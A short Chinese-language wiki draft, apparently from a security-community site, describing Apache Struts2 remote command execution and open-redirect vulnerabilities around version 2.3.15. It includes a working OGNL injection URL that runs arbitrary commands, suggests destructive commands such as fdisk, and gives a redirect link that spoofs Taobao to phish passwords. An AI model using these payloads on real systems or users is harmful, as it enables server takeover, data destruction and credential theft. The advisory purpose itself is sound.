漏洞:Struts2 遠程命令執行漏洞 Draft
Apache Struts是一款建立Java web應用程序的開放源代碼架構。Apache Struts存在一個輸入過濾錯誤,如果遇到轉換錯誤可被利用注入和執行任意Java代碼。
網站存在遠程代碼執行漏洞的大部分原因是由于網站采用了Apache Struts Xwork作為網站應用框架,由于該軟件存在遠程代碼執高危漏洞,導致網站面臨安全風險。CNVD處置過諸多此類漏洞,例如:“GPS車載衛星定位系統”網站存在遠程命令執行漏洞(CNVD-2012-13934);Aspcms留言本遠程代碼執行漏洞(CNVD-2012-11590)等。
在2013年6月底發布的Struts 2.3.15版本被曝出存在重要的安全漏洞,主要問題如下:
可遠程執行服務器腳本代碼
用戶可以構造http: //host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘command’,’goes’,’here’})).start()}鏈接,command goes here可以換成是破壞腳本的路徑和參數,比如fdisk -f等,造成破環系統無法運行的目的。
重定向漏洞
用戶可以構造如知名網站淘寶的重定向連接,形如< a href=”http : //www.淘寶.com/item00001.html?redirect: http: //黑客/getyourPassword”>打折新款,引導用戶點擊后進入釣魚網站,在界面上讓其進行登陸用以獲取用戶的密碼。
網絡安全學院 社區 Wiki
推薦文章: